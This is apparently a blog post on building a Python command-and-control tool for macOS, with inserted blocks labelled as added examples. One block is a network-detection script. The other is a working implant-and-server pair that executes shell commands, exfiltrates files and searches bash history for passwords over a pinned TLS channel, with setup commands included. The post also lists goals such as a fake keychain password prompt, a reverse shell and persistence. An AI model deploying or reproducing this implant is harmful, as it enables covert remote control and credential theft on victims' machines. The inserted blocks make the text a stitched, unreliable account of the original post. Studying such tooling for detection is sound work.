Overview

Since I was interested in learning the process of building a post-exploitation tool for macOS, I started with the concept of a client-server script relationship: the client runs on the "infected" macOS device and the server is the host I control the client from. Below is a simplified overview of the approach I went with:

High Level Command and Control Concept

I chose Python as the language since python2 ships with macOS and I use Python regularly. The client script is python2 and uses only standard-library modules, so it runs on any macOS endpoint without installing anything; the server is python3, since the server is a host I control and I could install whatever I needed there (though I ended up using only standard-library modules in the server script as well).

For encryption, I decided to go with SSL-encrypted socket connections for a couple of reasons:

Limited time on my end: encrypted sockets are quick to set up.

I thought encrypted sockets would be a good way to validate detections/preventions. Most DNS monitoring and sinkholing solutions rely on anomalies around domains (e.g. domain age, lack of certain DNS records for the domain, a domain blacklist match), so an encrypted socket straight to an IP address sidesteps those mechanisms. On the flip side, if an environment monitors connections to IP addresses that were never resolved through DNS, using tools like Bro IDS, then this activity would be flagged. So this seemed like a good test of where detections/preventions landed with this approach.

The method I used is definitely not the only way to do this; it just happens to be the one I chose. Several really neat toolkits use other channels, such as web APIs, for command and control.
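The detection side of the Bro IDS caveat above, as an added example that is not part of the original post: flag TLS sessions to an external address that no DNS answer ever returned. The log lines are a constructed, cut-down subset of the columns in Zeek (formerly Bro) conn.log and dns.log, and the function names are assumptions for the example.

```python
"""Added example, not the post's code: correlate a (constructed, simplified)
Zeek/Bro conn.log with dns.log to find TLS connections to IPs that were never
the answer to a DNS query. Column names follow Zeek's; only a subset is used."""
import ipaddress

# Constructed sample conn.log: one direct-to-IP TLS beacon (198.51.100.77)
# from two hosts, one TLS session to a resolved name, one internal TLS
# session and one plain HTTP session.
CONN_LOG = """\
#fields\tts\tid.orig_h\tid.resp_h\tid.resp_p\tservice
1500000001.0\t10.0.0.5\t93.184.216.34\t443\tssl
1500000002.0\t10.0.0.5\t198.51.100.77\t443\tssl
1500000003.0\t10.0.0.5\t10.0.0.1\t443\tssl
1500000004.0\t10.0.0.5\t203.0.113.9\t80\thttp
1500000005.0\t10.0.0.7\t198.51.100.77\t8443\tssl
"""

# Constructed sample dns.log: 'answers' is Zeek's comma-separated vector.
DNS_LOG = """\
#fields\tts\tid.orig_h\tquery\tanswers
1500000000.5\t10.0.0.5\texample.com\t93.184.216.34
1500000003.5\t10.0.0.5\tcdn.example.net\tedge.example.net,203.0.113.9,203.0.113.10
"""

# RFC 1918 space; checked explicitly because ipaddress.is_private also
# treats the documentation ranges used in the sample as private.
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_zeek(text):
    """Parse a Zeek TSV log into a list of dicts keyed by the #fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def resolved_addresses(dns_rows):
    """Every IP that appeared in a DNS answer (CNAME targets are skipped)."""
    seen = set()
    for r in dns_rows:
        for answer in r["answers"].split(","):
            try:
                ipaddress.ip_address(answer)
                seen.add(answer)
            except ValueError:
                pass
    return seen


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL)


def unresolved_tls(conn_rows, dns_rows):
    """Return (src, dst, port) for TLS sessions to external IPs never seen in DNS answers."""
    known = resolved_addresses(dns_rows)
    hits = []
    for r in conn_rows:
        dst = r["id.resp_h"]
        if r["service"] == "ssl" and not is_internal(dst) and dst not in known:
            hits.append((r["id.orig_h"], dst, int(r["id.resp_p"])))
    return hits


if __name__ == "__main__":
    for src, dst, port in unresolved_tls(parse_zeek(CONN_LOG), parse_zeek(DNS_LOG)):
        print("TLS to unresolved IP: %s -> %s:%d" % (src, dst, port))
```

In a real deployment the DNS lookup window has to be bounded in time and the client's resolver traffic has to actually pass the sensor (DNS over HTTPS or a hard-coded resolver will not appear in dns.log). Note also that a TLS session to a bare IP carries no SNI and, for a home-grown server, a self-signed certificate, both of which are independent signals a network sensor can key on.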

Some of the things I wanted the server to be able to command the client to do:

execute OS shell commands

grab screenshots

download files

pop up a fake keychain prompt and ask the user to enter their password

navigate the file system

spawn an interactive shell and send to an IP:port

search bash history for interesting strings

search for endpoint antivirus and monitoring software

add and remove persistence
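Putting the pieces above together, here is an added example (not the post's own code) of the client/server command loop over an SSL socket, with handlers for a few of the wish-list items: shell commands, navigating the file system, downloading a file and grepping bash history. The post's client is python2; this example is python3 (3.7+) and standard library only. The length-prefixed JSON framing, the "op"/"args" message layout and every function name are assumptions made for the example. Because a bare IP gives the client no hostname to verify, the client pins the SHA-256 fingerprint of the server's self-signed certificate instead of accepting any certificate, which is the one check that keeps the channel from being trivially intercepted.

```python
"""Added example of the client/server command loop described in this post.
Not the post's code: python3 (3.7+), standard library only. The framing,
the 'op'/'args' message layout and the function names are assumptions."""
import base64
import hashlib
import json
import os
import re
import socket
import ssl
import struct
import subprocess
import threading

# Framing: 4-byte big-endian length prefix, then a JSON document.
def send_frame(sock, obj):
    data = json.dumps(obj).encode()
    sock.sendall(struct.pack("!I", len(data)) + data)

def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf

def recv_frame(sock):
    (length,) = struct.unpack("!I", recv_exact(sock, 4))
    return json.loads(recv_exact(sock, length).decode())

# Client-side handlers for a few of the wish-list tasks.
def cmd_exec(args):
    p = subprocess.run(args["cmd"], shell=True, capture_output=True, text=True)
    return {"rc": p.returncode, "out": p.stdout + p.stderr}

def cmd_cd(args):
    os.chdir(args["path"])
    return {"cwd": os.getcwd()}

def cmd_download(args):
    with open(args["path"], "rb") as f:
        return {"b64": base64.b64encode(f.read()).decode()}

def cmd_history(args):
    pat = re.compile(args["pattern"])
    path = args.get("path", os.path.expanduser("~/.bash_history"))
    with open(path) as f:
        return {"hits": [line.rstrip("\n") for line in f if pat.search(line)]}

HANDLERS = {"exec": cmd_exec, "cd": cmd_cd, "download": cmd_download, "history": cmd_history}

def client_loop(sock):
    """Runs on the implant: read a command, dispatch it, reply, until 'exit'."""
    while True:
        msg = recv_frame(sock)
        if msg["op"] == "exit":
            return
        try:
            reply = HANDLERS[msg["op"]](msg.get("args", {}))
        except Exception as e:  # report the failure instead of dying on it
            reply = {"error": "%s: %s" % (type(e).__name__, e)}
        send_frame(sock, reply)

# TLS on top. No hostname exists for a bare IP, so the client pins the SHA-256
# of the server's self-signed certificate rather than trusting CERT_NONE blindly.
def server_context(certfile, keyfile):
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(certfile, keyfile)
    return ctx

def client_connect(host, port, pinned_sha256):
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # trust comes from the pin check below
    ssock = ctx.wrap_socket(socket.create_connection((host, port)))
    got = hashlib.sha256(ssock.getpeercert(binary_form=True)).hexdigest()
    if got != pinned_sha256:
        ssock.close()
        raise ssl.SSLError("server certificate fingerprint mismatch: %s" % got)
    return ssock

# Server side: send commands, collect replies, then tell the client to exit.
def run_session(sock, commands):
    results = []
    for c in commands:
        send_frame(sock, c)
        results.append(recv_frame(sock))
    send_frame(sock, {"op": "exit"})
    return results

def demo(commands):
    """Drive one session in-process over a plain socketpair (no TLS) so it runs offline."""
    srv, cli = socket.socketpair()
    t = threading.Thread(target=client_loop, args=(cli,))
    t.start()
    try:
        return run_session(srv, commands)
    finally:
        srv.close()
        t.join()
        cli.close()

if __name__ == "__main__":
    print(demo([{"op": "exec", "args": {"cmd": "id"}},
                {"op": "history", "args": {"pattern": "passw|ssh "}}]))
```

To run it over TLS for real, bind a listening socket wrapped with server_context() and point client_connect() at it. A self-signed certificate for the server can be made with openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 365 -subj /CN=c2, and the value to pin is the SHA-256 of the DER form (openssl x509 -in cert.pem -outform DER | sha256sum), which the client carries as a constant.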

Good news for several of the "wish list" items above is that I could leverage research done by other engineers in the industry. For example, I was able to use some of the osascript commands from the macphish tool by Paulino Calderon: https://github.com/cldrn/macphish/wiki/Osascript